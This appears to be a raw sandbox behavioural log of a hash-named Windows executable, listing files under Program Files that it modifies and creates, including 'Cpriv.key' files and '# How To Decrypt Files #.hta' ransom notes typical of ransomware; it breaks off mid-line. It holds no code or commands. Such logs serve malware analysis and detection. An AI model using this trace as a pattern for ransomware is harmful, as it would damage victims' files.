de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\PersonalContact.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105380.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151045.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Maroon.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\te\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0171685.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WPULQT98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\JOURNAL\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Etc\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01172_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15277_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows NT\TableTextService\TableTextServiceAmharic.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PAPYRUS\PAPYRUS.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\IPIRM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\TAG.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESNL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\GRIP.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPQUOT.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01160_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\dnsns.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0216612.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Style\GB.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ARCTIC\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\msadc\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199423.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY01491_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\SPACER.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_CN\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\PIXEL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImagesMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_center.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Biscay\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00157_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\ado\adojavas.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\3082\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\LAYERS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msadomd28.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107264.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\SalesReport.xltx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FRAR\MSB1FRAR.ITS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01171_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL026.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proofing.en-us\Proofing.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251871.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\send-email-16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18220_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\EDGE\EDGE.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01140_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\26.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\swiftshader\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00417_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL01041_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\EN00319_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00452_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\RSWOP.ICM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\AUTHOR.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WORDREP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\es.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsFormTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0214098.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\J0115855.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\RSSFeeds.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BD19827_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\am.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Photo Viewer\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Help\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\blank.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Kentucky\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB01741L.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\7z.sfx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\INDUST\INDUST.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-common_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00200_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18180_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.VisualElementsManifest.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECHO\ECHO.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SKY\SKY.ELM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\currency.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher_1.3.0.v20140415-2008.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285796.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18243_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSTORE_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Biscay\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ky\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\back_lrg.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02252_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proof.fr\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\psfontj2d.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187893.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00352_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01751_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\visualization\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\MS.WPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program 